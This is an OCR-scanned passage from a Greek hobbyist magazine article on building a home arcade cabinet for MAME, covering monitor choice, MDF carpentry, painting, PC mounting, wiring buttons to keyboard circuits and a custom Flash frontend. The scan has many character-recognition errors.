διαφορετική προέλευση κάθε πατήματος KAI 
δεν τα ταυτίζει. Έτσι, µε την ανυπομονησία 
στο KÖKKIVO KAI TO φιλαράκι να µε κοιτάζει 
σχεδὸν µε συμπόνια (πρέπει να ἐμοιαζα µε 
τρελὀ), συνδέω τα δύο νέα µου πληκτρολὀ- 


yia στο РС, τρέχω To MAMEUI κι ενεργοποιώὠ 
την επιλογἠ για τα πολλαπλά πληκτρολόγια. 
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Пєрітто va nw ὁτι λίγα δευτερόλεπτα афо- 
του ξεκίνησα ro прото nalxvidi, το παράξενο 
βλέμμα στο πρὀσωποτου φίλου εξαφανἰστη- 


1. Ναι, ¿xw πολλά κουτιά µε “савора”, την οποία οι φίλοι µου αποκαλούν σαβούρα, ενώ εγώ επιµένω бт! 
Ναι, EX mà y ; 

πρὀκειται για... "σαβούρα”. 

2. Εἰδατε που ¿xw δίκιο µε το “σαβούρωμα”; 


Χωρίς KEPUATODEKTN (μέρας 1/2) 
Αα 


κε και τη θέση rou πἠρε то ύφος ενὸς πωρωμένου паіктп! Н δουλειά µου 
εἰχε τελειώσει - ἡ τουλάχιστον ETO! νόμιζα. 


Πλάκα δεν Oa "XE; 


Μετά ano αρκετἠ opa παιχνιδιού διαπιστώνουμε το αυτονόητο: O μοχλός 
TOU joystick δίνει ἄλλον αἐρα στα παιχνίδια! Ταυτόχρονα, ωστόσο, δια- 
πιστώνουµε ὁτι η ὑπαρξη EVÖG και μόνο κουμπιού στα joystick εἶναι ιδι- 
αἱτερα περιοριστικἠ. Н δεύτερη διαπίστωση µας ενοχλεἰ αρκετά και ano- 
φασίζουμε va παϊξουμε λίγο ακόμα, ETOI, για να ξεχαστούμε ;) Λίγη opa 
αργότερα, ra πονεμένα µας δάχτυλα μὰς πεϊθουν για την αξία ενὸς δια- 
λείμματος. Το κάνουμε, όμως το παιχνίδι δεν φεύγει anó τη OKEWN µας. 
Αρχίζουµε να σκεφτόμαστε πιθανές μεθόδους για την περαιτέρω BeArio- 
ση της εµπειρἰας. Ano την ιδέα της επἐµβασης с’ ἄλλα joystick περνάμε σ΄ 
αυτή της κατασκευἠς ενὸς gaming-panel µε πολλά κουμπιά και joystick, 
για να καταλήξουμε στην υπέρτατη λύση: Την κατασκευἠ ενὸς μεγάλου 
arcade cabinet! Μιλάμε yia τα μεγάλα κουτιά, µε Ta 
πολλὰ και χορταστικἀ κουμπιά και τους HETAAAIKOUG 
μοχλούς. H ιδέα και μόνο µας ενθουσιάζει και πολύ 
γρήγορα παἰρνουµε την απὀφαση να το φτιάξουμε! 
Όμως кат! τέτοιο δεν γίνεται µέσα σ΄ Eva απόγευμα. 
Η υπόθεση σηκώνει µελέτη... 


Συγκέντρωση εξαρτημάτων, αποφάσεις yia 
την οθόνη 


О! εργασίες δεν άργησαν να ξεκινήσουν. To прото 
που έπρεπε να γίνει ἦταν η αναζήτηση rov anapai- 
τητων εξαρτημάτων για TO NAEKTPOVIKO μέρος της 
κατασκευἠς. To arcade cabinet ουσιαστικά θα φιλο- 
ξενούσε Eva пало PC στο οποίο θα συνδέονταν δύο 
πληκτρολόγια, επάνω στα οποία θα συνδέονταν µε тп 
σειρὰ τους τα κουμπιά KAI O! μοχλοὶ κάθε παἰκτη. Me- 
PITTÖ να πω Ori то пало PC υπήρχε ἠδη, στα κουτιά 
µε τη “oaBoupa”. Τι θα Exava ὁμως HE τα χειριστή- 
pia; H λύση βρέθηκε στο ebay! Με µία αναζήτηση για 
"arcade buttons" εμφανίστηκαν OETAKIA µε κουμπιά 
και μοχλούς, παρόμοια µε ᾿κεἰνα που διέθεταν ra na- 
Ala arcade cabinet. Μετά ano λίγο ψάξιμο κατέληξα 
στην παραγγελἰα ενὸς φτηνού σετ, το οποίο περιλάμ- 
Bave δύο μοχλούς και εἰκοσι κουμπιά. Με την ευκαι- 
pia, να σημειώσω От! οι μοχλοἰ αποτελούσαν κινέζικες 
απομιμήσεις και ονομάζονταν Zippy. Ωστόσο, ὀταν 
τους nap&Aafa διαπίστωσα бт! ἠταν παραπάνω ano 
ικανοποιητικοἰ. Στο ελληνικό αντίστοιχο του ebay (σε 
κάποιο απ’ αυτά, τέλος πάντων :D) βρήκα και πολλὲς 
παλιὲς οθόνες. Όμως TI εἰἶδους οθὀνη έπρεπε να αγοράσω; H λύση της 
CRT θα ἦταν πολύ πιο κοντὰ στις παλιὲς αυθεντικὲς οθὀνες, αλλά οι CRT 
εἶναι ογκώδεις και βαριὲς. Κατὰ πάσα πιθανότητα, το γεγονὸς auró θα 
περιέπλεκε σηµαντικἀ την κατασκευὴ του KOUTIOU. Κάπως ἐτσι κατέληξα 
στις μικρὲς, λεπτὲς κι ελαφριὲς TFT. Έπρεπε ὁμως va апофасісо και TO 
μέγεθος. Τα περισσότερα παλιά παιχνίδια σχεδιάζονταν για “τετράγωνες” 
οθὀνες 4:3 ἡ µακρὀστενες -- αλλά µε τη µεγάλη διάσταση στο KATAKOPU- 
фо. Αν αγὀραζα µακρόστενη οθόνη, η µικρή γωνία θἐασης nou χαρακτη- 
piei τα φτηνά μοντέλα θα µου απαγόρευε va την τοποθετήσω στο ὀρθιο. 


Εικόνα 2 

Δεν εἶναι αυτὀ 

που λέμε "the real 
thing”, αλλά θα σας 
ικανοποιήσει στα 
σίγουρα τόσο µε 
την αἴσθηση боо 
και µε το χαμηλό 
του κόστος ;) 


Εικόνα 3 
Κατασκευασμένα 
για να τα πατάμε 

ue μανία! Εσείς 
μπορείτε να τους 
αντισταθείτε; 


Εικόνα 4 

О σχεδιασμός ενὀς 
arcade cabinet ©є- 
κινάει апо To про- 
φίλ του. Δεν πρὀ- 
κειται για κανέναν 
απαράβατο κανόνα, 
σκαλισμένο σε пё- 
тра, αλλά αποτελεί 
ша καλἠ πρακτική, 
εφόσον το προφίλ 
καθορίζει σε µεγά- 
Ao βαθμό το TEAIKO 
σχήμα Tou cabinet. 


Εικόνα 5 

Κατά τη σχεδίαση 
των τμημάτων που 
θα φιλοξενούν τα 
χειριστήρια και την 
οθόνη, θυμηθείτε 
να σηµειώσετε όλες 
τις αποστόσεις και 
τα μεγέθη. Θα σας 
χρειαστούν στο ξυ- 
λουργείο! 


ВВ 


VHAOKER 
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Κάτι TETOIO θα σήμαινε την αλλοίωση των χρωμάτων και της εικόνας, 
οπουδήποτε KI αν καθόμουν. Επομένως η λύση της “τετράγωνης” οθὀνης 
4:3 φάνηκε у’ αποτελεἰ μονόδρομο. Οι μεγαλύτερες οθὀνες р’ αυτές τις 
αναλογἱες και προσιτό κόστος εἶναι οι 19dpEc... Н δουλειά για εκείνη τη 
μέρα EIXE τελειώσει. Πλέον, εἶχα βρει οτιδήποτε χρειαζόμουν για va δου- 
λέψει TO arcade cabinet. AUTO nou ¿peve тау η κατασκευἠ του ἰδιου του 
cabinet, το βάψιμο, η συναρμολόγηση, η τοποθέτηση rov ηλεκτρονικὠν 
και το σετάρισμα του λογισμικού. Μ΄’ quTñ τη σκέψη αποσύρθηκα, σχεδὸν 
εξαντλημένος... 


Κανόνες και συμβάσεις 


Άραγε, noc ακριβώς ἦταν ra пала 
arcade cabinet; Σίγουρα ὁλοι θυ- 
μόμαστε nog ἐμοιαζαν, ὁμως QUTO 
δεν εἶναι αρκετό για να κατασκευἁ- 
coupe Eva! Με µια γρήγορη αναζἠ- 
τηση στο δίκτυο κατέληξα σε δύο 
συμπεράσματα: Πρῶτον, το KOUTI 
μπορεί va ἐχει σχεδὸν οποιοδήποτε 
σχήμα, καθώς δεν υπἠρξε ποτὲ Eva 
συγκεκριµένο πρὀτυπο. Δεύτερον, 
θα έπρεπε va To σχεδιάσω μόνος 
μου, αφού κανένα апо Ta ἑτοιμα 
σχέδια που βρήκα δεν тау ικανο- 
ποιητικὀ. Σας έχω μιλήσει για то 
flash; Μιλάω yia το εργαλείο ava- 
πτυξης που δίνει η Adobe στα πα- 
κέτα CS-KATI. Πα να unv ξεφεύγω, 
θα по μόνο ότι µου αρέσει ο τρόπος 
που “κόβει” τις γραμμὲς και τα διά- 


Χωρίς κερματοδέκτη (µέρος 1/2) 
Αα 


φορα σχήματα. Θα πρέπει να σας 
no επἰσης бт! δεν γνωρίζω kav- 
να ἆλλο σχεδιαστικὀ πρὀγραμ- 
ра ;) H απόφαση λοιπὀν για την 
επιλογἠ του προγράμματος ἦταν 
εὐκολη. Ἄνοιξα το flash κι ἄρχισα 
να κάνω τις δοκιμὲς µου. Σύντο- 
μα διαπἰστωσα От! το nÀšov κα- 
θοριστικὀ κομμάτι για την TEÄIKI) i = 
µορφή evöc arcade cabinet εἶναι 
TO προφἰλ rou. Θα έπρεπε λοιπὸν 
να ξεκινήσω ano αυτὀ. Ωστόσο, 
πριν συνεχίσω µε το flash nrjpa 
το μέτρο κι ἄρχισα να µετράωτις 
καρέκλες του σπιτιού, το ύψος 
του κεφαλιού µου όταν κάθομαι 
και τις διαστάσεις του γραφείου 
µου. Βλέπετε, έπρεπε να £xo µια 


γενική αἰσθηση των διαστάσε- 
ων ка! της στοιχειώδους εργο- 
νομίας, ώστε va σχεδιάσω кат! 
μπροστὰ στο οποίο θα μπορούσα 
να κάθομαι άνετα και να βλέπω 
καλά! Αμέσως μετά ὀρισα αυθαἰ- 
peta µια κλίμακα, ὥστε τα σχὲ- 
Sıû µου να τηρούν τις ἴδιες πάντα 
αναλογίες σε σχέση µε την TENI- 
ků κατασκευἠ και να µην εἶναι 
παραπλανητικἀ. Па την ιστορία, 
συμφώνησα µε τον εαυτό µου 
бт! σε κάθε σχέδιο TO EVA εκα- 
тосто του πραγματικού κόσμου 
θα αντιστοιχούσε σε 16 pixels. 
Έχοντας αυτά ката vou, σχεδἰα- 
σα Eva προς Eva τα κομμάτια που 
απαρτίζουν το KOUTI. 


Στο ξυλουργείο 


Περιττὀ να πω óri η υπόθεση εἶχε 

γίνει πλέον προσωπικὀ ζήτημα. Με τα σχέδια τυπωμένα στο xépi ὀρμησα 
στο ξυλουργείο του патёра µου κι ἀρχισα va εξετἆζω τους διάφορους 
τύπους ξύλου. AUTO που φαινόταν να EXE! τις πλέον κατάλληλες ιδιότητες 
yia την κατασκευή rou arcade cabinet ἦταν To МОЕ. Ουσιαστικά πρὀκειται 
για πεπιεσμένο χαρτὶ, το οποίο ωστόσο εἶναι βαρύ, ανθεκτικὀ και κὀβε- 
ται EUKOAA, χωρὶς va θρυμματίζεται στις ἄκρες TOU. Όμως πριν πιάσω TO 
πριόνι επέστρεψα για λίγο στον υπολογιστή. Αφενός ἐπρεπε να κάνω τη 
μέγιστη δυνατὴ οικονομία σε MDF (εἶναι αρκετά akpiBó το ато), αφε- 
τἐρου έπρεπε να διασφαλίσω ὁτι τα δύο πλαϊνά κομμάτια του κουτιού θα 
ἦταν πανομοιότυπα. H λύση nou OKERTINKA για το δεύτερο ἦταν апл: Θα 
ἐφτιαχνα Eva σάντουιτς апо δύο φύλλα MDF, θα σχεδἰαζα ro επιθυμητὀ 
περίγραμμα και θα τα ёкоВа μαζί. Μπροστά στον υπολογιστή λοιπὸν, Kå- 
νοντας δοκιμές µε TO OXEÖIAOTIKO πρὀγραμμα ἄρχισα ν΄’ αναζητώ τις ελά- 
χιστες διαστάσεις που πρέπει να EXEI Eva ορθογώνιο κομμάτι MDF, ώστε 
να χωράει ортака “μέσα” του ro πλαϊνό κομμάτι του KOUTIOU. Αργότερα 


Εικόνα 6 

Av σας χαρίζουν то 
MDF, µπορείτε va 
αγνοήσετε AUTÓ TO 
βήμα. Αν όμως то 
πληρώσετε, кала 
θα κάνετε va Φρο- 
ντίσετε για την ка- 
λύτερη αξιοποίηση 
κάθε φύλλου... 
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Eikóva 7 

Δεν πρὀκειται για 
To ἑνα ano τα δύο 
πλαϊνά κομμά- 

τια του κουτιού. 
Πρόκειται για ἑνα 
σάντουιτς δύο 
φύλλων MDF, Kop- 
μένο στο σχήμα 
του προφίλ του 
κουτιού. Με αυτή 
τη μέθοδο θα εξα- 
σφαλίσετε ότι та 
δύο πλαϊνά θα εἰναι 
πανομοιότυπα! 


Εικόνα 8a, 8b 

Па τη μέγιστη av- 
θεκτικότητα апо- 
φασίσαμε va προσ- 
δέσουµε Ta “шкра” 
κομμάτια TOU KOU- 
TIOU πάνω στα δύο 
πλαϊνά, χρησιμο- 
ποιώντας µεταλλι- 
KEG ywviec και βίδες 
µε παξιμάδια. Στις 
εικόνες φαίνεται η 
προσάρτηση ξύλι- 
νων οδηγών στα 
πλαϊνά κομμάτια 
του KOUTIOU, πάνω 
στους οποίους θα 
πατήσουν και θα 
βιδωθούν ra unó- 
Aoina. 
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θα ἐκοβα δύο τέτοια ορθογώνια κομμάτια, Oa ἐφτιαχνα TO σάντουιτς που 
ανέφερα και θα τα ἑκοβα στο σχήμα του προφίλ του KOUTIOU µου. Τι θα 
ἑκανα όμως µε то ξύλο που θα περἰσσευε апо AUTO TO στἆδιο της εργα- 
σίας; Φυσικά και δεν θα το πετούσα! Ακριβώς γι’ αυτό, πριν αφήσω τον 
υπολογιστή ἄρχισα να παϊζω Eva εἶδος πἀζλ, προσπαθώντας va χωρέσω 
000 πιο πολλά κομμάτια γινόταν στα τμήματα του ξύλου που θα nepio- 
σευαν μετὰ την κοπή των πλαϊνών. Όλα τα παραπάνω Eva μαστόὀρι θα та 
περιέγραφε ως εξἠς: “Προσπαθούσα va nepiopiow τη фора!” Όταν ἑφτα- 
σα σε EVA ικανοποιητικὀ αποτέλεσµα (yia την ακρἰβεια όταν βαρέθηκα :D) 
τύπωσα τα TEÄIKÄ σχέδια κι ἐφυγα ξανά για To ξυλουργεἰο. 


Μετὰ апо μερικὲς ὧρες KATA τις ONOIEG στενάξανε τα πριὀνια, εἶχα µπρο- 
OTA µου τα κομμάτια του KOUTIOU! Αφού µου ἐδωσα μερικὰ λεπτά για va 
ξεπεράσω το αρχικὀ στάδιο της συγκίνησης, συνειδητοποίησα ὁτι βρισκὀ- 
μουν μπροστὰ o’ Eva ακόμα πρόβλημα: lloc ото кало θα συνέδεα τα κοµ- 
μάτια, WOTE να εἶναι στιβαρή η κατασκευή; Av χρησιμοποιούσα απλὲς ξυ- 
λόβιδες, μετὰ апо ша-био συναρμολογήσεις kai αποσυναρμολογἠἡσεις o! 
appoi θα ξεχείλωναν και то KOUTI θα γινόταν χάρβαλο. Αποφάσισα λοιπὸν 
να χρησιμοποιήσω μεταλλικὲς γωνίες, τις οποίες θα ἐσφιγγα Χρησιµοποι- 
ὠντας βίδες µε παξιμάδια. Συγκεκριµένα, αποφάσισα να χρησιμοποιήσω 
τις λεγόμενες καρὀβιδες. Αυτὲς οι βίδες, στα τελευταία Χιλιοστά πριν το 
κεφάλι τους χάνουν το κυλινδρικὀ σχήμα και η τομὴ τους γίνεται τετρα- 
γωνικἠ. Έτσι, ὅταν μπαίνουν στο ξύλο σφηνώνουν και δεν περιστρέφο- 
ута! µε συνέπεια να βιδώνονται άνετα χωρίς να κρατάμε kóvrpa апо το 
κεφάλι τους. H συναρμολόγηση λοιπὸν θα γινόταν µε καρόβιδες, οι οποίες 
θα ἐσφιγγαν τα μικρότερα κομμάτια του KOUTIOU πάνω στα δύο μεγάλα 
πλαϊνά. 'Hrav εὐκολο. Την επόμενη μέρα εἶχα τελειώσει. 


Newbie-yxakep µπογιατζἠς 


Πλέον το εἶχα. To δικὀ µου arcade cabinet, σχεδιασμένο µε την φουτου- 
ριστικἠ άποψη των 70s, στεκόταν μπροστὰ µου! Μπορείτε να φανταστεὶ- 


Χωρίς κερματοδέκτη (µέρος 1/2) 
Αα 


τε ποιο ἦταν το прото πράγμα nou 
¿kava ὁταν χόρτασα va το χαζεύω; 
Ὄχι, δεν συνέχισα να το χαζεύω 
(πολὺ lame αστείο), апла πήρα το 
κλειδὶ κι ἄρχισα να ro αποσυναρ- 
μολογώ. Εκείνη τη στιγμή σκεφτὀ- 
μουν μόνο το πόσο πιο ὀμορφο 
θα γινόταν μετὰ το βάψιμο. Όλα 
σχεδὀν τα υλικά, πριν δεχτούν τη 
βαφή, πρέπει να καλυφθούν µε TO 
λεγόμενο αστάρι. Αυτός ο KAVO- 
νας ισχύει και για το ξύλο και πολύ 
περισσότερο yia то MDF, το onoio 
ano τη φύση rou απορροφάει κάθε 
ἵχνος υγρασίας που βρἰσκεται στο 
περιβάλλον του. Ἠταν επιτακτι- 
κὀ, λοιπὀν, πριν χρησιμοποιήσω 
οποιαδήποτε μπογιά va καλύψω 
τα κομμάτια της κατασκευἠς µε 
μερικὰ χέρια sealer. Nai ξέρω, το 
sealer δεν αποτελεἰ το TUNIKO εἶδος 
ασταριού, алла πετυχαίνει ακριβώς 
αυτὸ που ἠθελα: Σφραγίζει τους 
πόρους του ξύλου, το προστατεύει 
ano την υγρασία kai προσφέρει μία 
λεία επιφάνεια για βαφἠ. Ta kop- 
μάτια της κατασκευής καλύφθηκαν 
µε rpia ҳёра sealer, ανάµεσα στα 
onoia ἐκανα κι ἑνα ελαφρύ τρίψιμο 
µε ψιλὸ γυαλόχαρτο. Ακολούθησε 
το βάψιμο, ro onoio έγινε µε ρολὀ και χρησιμοποιώντας μπογιὲς για pė- 
ταλλα. Προφανώς, QUTO δεν ἐγινε εσφαλμένα. Ἠταν µια συνειδητή £ni- 
λογή μακριά and την кой λογική -- ӧпос̧ ἄλλωστε συμβαίνει και µε TIG 
περισσότερες χακεριὲς ;) Ἠθελα OI επιφάνειες του KOUTIOU HOU να έχουν 
μεταλλική OWN, AUTO που στην πιάτσα λένε "μεταλλιζέ”. Συγκεκριµένα, 
ἠθελα οι рпоүс̧ µου να περιέχουν n£pÀa και va λαμπυρίζουν ελαφρώς, 
όπως EVA γυαλισμένο κομμάτι μετάλλου. Όμως η népAa διατίθεται μόνο 
σε χρώματα για μέταλλα. Το βάψιμο ἦταν αρκετά εὐκολο. H μόνη nayi- 
δα αφορούσε στον поло χρόνο που απαιτούσαν oi μπογιὲς μετάλλου για 
να OTEYVMOOUV πάνω στο sealer ξύλου. Συγκεκριμένα, ανάμεσα στα δύο 
“χέρια” βαψίματος χρειάστηκε να µεσολαβήσουν τουλάχιστον δέκα MPEG, 
EVM για TO οριστικὀ στέγνωµα του δεύτερου χεριού χρειάστηκαν σχεδὸν 
δύο μέρες. Αν αναρωτιὲστε пос διαπίστωσα ὁτι απαιτούνται τόσες MPEG, 
μπορούν va σας το εξηγἡσουν οι δαχτυλιὲς µου επάνω στο κουτί. 


Kick — proof 


Meta To βάψιμο npoxopnoa στην τελικἠ συναρμολόγηση. To arcade 
cabinet ñTav ἐτοιμο πλέον να φιλοξενήσει τον υπολογιστή και Ta χειρι- 
στήρια. Арҳіка αποφάσισα να ασχοληθὠ µε ra βασικἀ εξαρτήματα του 
PC: Τη μητρικἠ, το τροφοδοτικὀ KAI το σκληρὀ δίσκο. Па τη στήριξη της 
µητρικἠς χρησιμοποίησα και πάλι βίδες µε παξιµάδια. Συγκεκριµένα χρη- 
σιµοποἱησα βίδες τύπου 3x603. Επάνω στη µητρικἡ βέβαια δεν ἠθελα va 


3. O πρὠτος αριθµὀς εκφράζει το πάχος της βίδας και ο δεύτερος το μήκος — πάντα σε χιλιοστά. 


Εικόνα 9 

Κάτι ξεχάσαμε! Δεν 
πειράζει, όμως, 
αφού η µορφή του 
arcade cabinet 
εἶναι ήδη Ικανοποι- 
ητική... 
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Εικόνα 10 

To τροφοδοτικό 
πατάει σε δύο µε- 
TAAAIKEG γωνίες 
στα δεξιά και o” Eva 
λαστιχένιο σφουγ- 
γαράκι oT’ αριστε- 
pä. H ακούσια µε- 
τατόπισή του εἶναι 
αδύνατη, ενώ οι 
κραδασμοί που HE- 
ταφἑρονται ano και 
προς το κουτί εἶναι 
περιορισμένοι. 


Εικόνα 11a, 11b 
O σκληρός δίσκος 
των 2.5 IVTOWV έχει 
βιδωθεί σε πάνω 

σε δύο μεταλλικές 
γωνίες, δίπλα στον 
ανεμιστήρα. Αυτή η 
στήριξη προσφέρει 
ελαστικότητα, ενώ 
η θέση εξυπηρε- 
Tei την καλύτερη 
δυνατή ψύξη του 
(vai, ο ανεμιστήρας 
εἶναι βιδωμένος 
στραβά :S) 


YV HAQKER 
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22 
کے 


M 
W 


βιδώσω κανενὸς εἶδους μεταλλικὀ στήριγμα. Έτσι, την τοποθέτησα στον 
πάτο του KOUTIOU και σημάδεψα τη θέση που βρίσκονται οι τρύπες της. 
Στη συνέχεια την απομάκρυνα κι ἄνοιξα τρύπες στις σημειωμένες θέσεις, 
µε EVA тропамі τριών χιλιοστών. Апо αυτὲς τις τρύπες πέρασα τις βίδες, 
τις οποίες φρόντισα va σφἰξω στο KOUTI p’ Eva παξιμάδι. Πλέον, and τον 
πάτο του KouTIOU εξείχαν πέντε βίδες, στις θέσεις ακριβώς nou η μητρικἠ 
μου EIXE τις τρύπες της. Ωστόσο, πριν βάλω πάνω τη μητρικἠ πέρασα σε 
κάθε βίδα Eva πρὀσθετο παξιμάδι. Το δεύτερο παξιμάδι βιδώθηκε τόσο, 
ὥστε να απέχει ακριβώς δύο EKATOOTA ané τον πάτο του KOUTIOU. Μ΄ 
AUTO τον τρόπο, ὀταν ἐβαλα τη μητρικἠ να καθίσει στις βίδες, στεκόταν 
πολύ σταθερά, αφήνοντας Eva περιθώριο δύο εκατοστών απὀ τον пато. 
Πριν προχωρήσω στα υπόλοιπα εξαρτήματα, ἐβαλα KI Eva τρίτο παξιμᾶδι, 
πάνω ano τη μητρικἠ, στις γωνιακὲς βίδες. H μητρικἠ δεν μπορούσε va 
πάει πουθενὰ! Па το δίσκο και το τροφοδοτικὀ χρησιμοποίησα και πάλι 
HETAAAIKEG γωνίες. Αρχικά TIG βίδωσα πάνω στις συσκευὲς µε τέτοιο TpÓ- 
πο, ὥστε να EEEXOUV σαν афта. Στη συνέχεια τοποθέτησα τις OUOKEUEG 
στις επιθυμητὲς θέσεις και βίδωσα τα μεταλλικἁ τους афт!й στο KOUTI. 
Οι μεταλλικὲς γωνἰες (δύο για κάθε εξάρτημα) προσέφεραν δυνατό алла 
και OXETIKA ελαστικὀ κράτημα. Το τροφοδοτικὀ και ιδιαίτερα ο δίσκος θα 
επιβίωναν ακόµα KAI μετὰ апо πολλὲς KÄWTOIEG στο KOUTI! Τέλος, το OTE- 
ρἑωμα της οθὀνης οὐτε κἄποιο πρόβλημα παρουσίασε, οὐτε µε επισφαλἠ 
τρόπο ἐγινε. Kick-proof all the way! 


Χωρίς KEPUATODEKTN (μέρας 1/2) 
ri 


Ηλεκτρική Hakapovada 


Μετά ano ra παραπάνω εἶχα μπροστὰ pou ша ayyapeia nou ανἐβαλα ou- 
νεχώς: Τη διασύνδεση των πλήκτρων και των роҳлоу. Μ΄ vav μοχλὸ 
και EEI πλήκτρα για κάθε παἰκτη, καθὼς KI окто ακόμα κουμπιά γενι- 
κὴς χρήσης (select, exit, coin, player 1 start, player 2 start κ.λπ.) εἶχα 
μπροστὰ µου 28 διακόπτες’ τους οποίους έπρεπε να συνδέσω επάνω στις 
πλακέτες δύο πληκτρολογἰων. Θα εφἁρμοζα και пал την TEXVIKN που ‘xa 
χρησιμοποιήσει yia την αναβίωση των δύο παλιών joystick. Ἠξερα πολύ 
кала τι έπρεπε να κάνω, αλλά έπρεπε να συνδέσω 56 καλώδια! Με αρκετὀ 
μουρμουρητὀ (πιο δυνατὸ апо τις προηγούμενες φορὲς KAI µε περισσὀ- 
тєра... σύμφωνα) κὀλλησα όλα τα καλώδια πάνω στους διακόπτες και 
στερέωσα τα κουμπιά και τους μοχλούς στις θέσεις τους. Εδὠ πρέπει va 
πω бт! ἑνα πληκτρολόγιο θα επαρκούσε για τη σύνδεση όλων των χειρι- 
στηρἰων. Ωστόσο θεώρησα фр©м!но va xw διαφορετικὀ πληκτρολόγιο 
για τα χειριστήρια κάθε παἰκτη. Μ΄’ auróv τον τρόπο, µε боп pavia κι av 
ἐπαιζε ο καθένας τα κουμπιά δεν θα κολλούσαν NOTE και το εκάστοτε NAI- 
xviài θα εξελισσόταν орала. Τα πληκτρολόγια που επιστράτευσα ἦταν та 
φτηνότερα που κατάφερα να βρω στην αγορά. Όμως QUTA τη Popa δεν 
κὀλλησα τα καλώδια των διακοπτὠν απευθείας επάνω στις πλακέτες των 
πληκτρολογἰων. Πήρα δύο шкрёс διάτρητες πλακέτες (proto-board) και 


4. Κάθε μοχλός διαθέτει 4 διακόπτες, EVAV για κάθε κατεύθυνση. 


Εικόνα 12 

Με εξαίρεση τους 
ανεμιστήρες, όλα 
τα υπὀλοιπα εἶναι 
έτοιμα. Πίσω KI api- 
отєра της μητρικής 
φαίνεται το κουτί 
ano Eva παλιό σετ 
ηχείων. (Ξέρετε, 
απὀ τη "σαβούρα” 
μου!) Το μόνο που 
EXE! μείνει μέσα 
του εἶναι το (μικρὸ) 
τροφοδοτικὀ και TO 
κύκλωμα ενίσχυ- 
σης. 


Εικόνα 13 

Ένα τυπικὀ κύκλω- 
ра ano πληκτρολό- 
γιο USB. Οι επαφές 
TOU εἶναι XWPIOLE- 
VEG σε δύο οµάδες. 
Βλέπετε, για TN δι- 
ασύνδεση των πλή- 
κτρων та περισσὀ- 
τερα πληκτρολόγια 
χρησιμοποιούν µία 
διάταξη matrix. О! 
επαφές της μίας 
ομάδας npoopilo- 
ита! yia TIG γραμμές”, ενώ οι επαφἑς της ἄλλης για τις στήλες 


της διάταξης matrix. Συνδυάζοντας (σχεδὀν) οποιαδήποτε ena- 


Фп της μίας ομάδας µε μία επαφἠ της ἄλλης, το πληκτρολόγιο 
στέλνει τον αντίστοιχο χαρακτήρα στον υπολογιστή. 


Εικόνα 14 

Πα την ελάχιστη 
καταπόνηση της 
πλακέτας του πλη- 
κτρολογίου κρίθηκε 
απαραίτητη η kara- 
σκευἠ µιας πλακέ- 
тас... proxy! Στη µία 
πλευρά της πλακέτας 
βρίσκονται κλέμες 
για την εὐκολη σύν- 
δεση κι αποσύνδεση 
των καλωδίων, ενώ 
στην ἄλλη μία σειρἆ 
ακροδεκτών για το κούμπωμα µε την πλακέτα TOU πληκτρολο- 
γίου. 


Εικόνα 15 

Το αποτέλεσµα 
µπορεί va µη poid- 
ζει επαγγελματικό, 
αλλά δουλεύει 
άριστα και ολοκλη- 
ρώθηκε σε ελάχιστο 
χρόνο! 


Εικόνα 16 

Εσείς πόσο дееК 
είσαστε; Βαθμο- 
λογήστε µε ἀριστα 
το δέκα, πόσο σας 
αρέσει η θέα των 
καλωδίων για τα 
PUBLIOTIKG... 
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κὀλλησα σε καθεμία кАёнєс των 
18 επαφών. Στη συνέχεια OUVE- 
δεσα τις πλακέτες µου πάνω o' 
εκείνες των πληκτρολογἰων, µε 
τἐτοιο τρὀπο WOTE οι 8 єпафёс 
ano TIG κλέμες να μπορούν να 
συνδυαστούν µε καθεμία апо τις 
υπόλοιπες 10 επαφές. Έτσι, πάνω 
σε ká0E πλακέτα μπορούσα va 
συνδέσω μέχρι και 80 (!) διακὀ- 
πτες. Φυσικἁ η συνδεσμολογἰα 
ἠταν τέτοια, OOTE καθένας and 
τους διακόπτες να στέλνει μέσω 
του πληκτρολογἱου vav διαφορε- 
TIKO χαρακτήρα στον υπολογιστή. 
Αυτὸ ἡταν! To hardware της nai- 
χνιδοµηχανής Hou ἦταν σχεδὸν 
ἑτοιμο. AUTO που anépeve тау η 
σύνδεση των ηχείων ка! των ανε- 
μιστήρων. H διευθέτηση των ηχεἰ- 
ων εἶναι αυτονόητη. Όσο για τους 
ανεμιστήρες, yia να περιορἰσω τον 
θόρυβο τους συνέδεσα ауа δύο και 
σε σειρἀ, στα 12V. Έτσι ο καθένας 
λειτουργούσε στα 6V, περιστρε- 
φόταν µε µικρἠ ταχύτητα κι ἐκανε 
ανεπαϊσθητο θόρυβο. 


Linux... ὅταν πρέπει 


Έχοντας ολοκληρώσει το arcade 
cabinet kai τη σύνδεση των ηλε- 
κτρονικῶν, ἐμενε μπροστά µου TO 
σετάρισμα του λογισμικού. Όταν 
ξεκίνησα To Oho εγχείρημα εἰχα 
rön αποφασίσει πως o υπολογιστἠς 
μέσα στο arcade cabinet θα φορ- 
тоу! κάποιο λειτουργικὀ σύστημα 
και στη συνέχεια ἑνα frontend για 
то МАМЕ, ὡστε o παἰκτης va eni- 
λέγει παιχνίδι και φυσικά va nai- 
ζει. Επομένως ἐπρεπε να βρω το 
frontend nou θα µου άρεσε περισ- 
σὀτερο και το οποίο θα ἐβαζα στη 
µηχανἠ µου. Σύντομα, ωστόσο, 
απογοητευμένος απὀ την αισθη- 
τικἠ και τη λειτουργικότητα όσων 
δοκίμασα, αποφάσισα να φτιάξω το 
δικὀ µου. Θα το ἐφτιαχνα σε flash, 
θα то "μεταγλώττιζα” σε GUTOTEAEG 
projector και θα το ἐβαζα στην au- 
тӧратп εκκίνηση του συστήματος. 


Χωρίς KEPUATODEKTN (μέρας 1/2) 
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Δυστυχώς auTn η επιλογἠ µε UNOXPEWOE va отрафо στα Windows, καθώς 
το flash δεν παράγει projector files yia To Linux®. Па uia ακόµα фора, 
λοιπὀν, ἀνοιξα το περιβάλλον ανάπτυξης rou flash και ξεκίνησα το σχεδι- 
асно του περιβάλλοντος και της “μηχανής” Tou frontend. 


EE M MM пиш | ош | | 


control: manual 
navigation: joystic 
engagement 


—— == 


select coin volume pause 
1 N \ J 


өө өөө 
| 1 | l 
exit Тир & 2up start setup 


press: select — — rotate: left / right 


player 2 


eo 


Поло σύντομα έπεσα πάνω o’ Eva εμπόδιο: Па Aóyouc ασφάλειας To flash 
απαγορεύει την εκτέλεση εξωτερικών προγραμμάτων µε χρήση παραμέ- 
τρων. Έτσι, To frontend µου θα μπορούσε να εκτελεἰ то МАМЕ αλλά δεν 
θα μπορούσε να rou δίνει τις κατάλληλες παραμέτρους, WOTE va EEKI- 
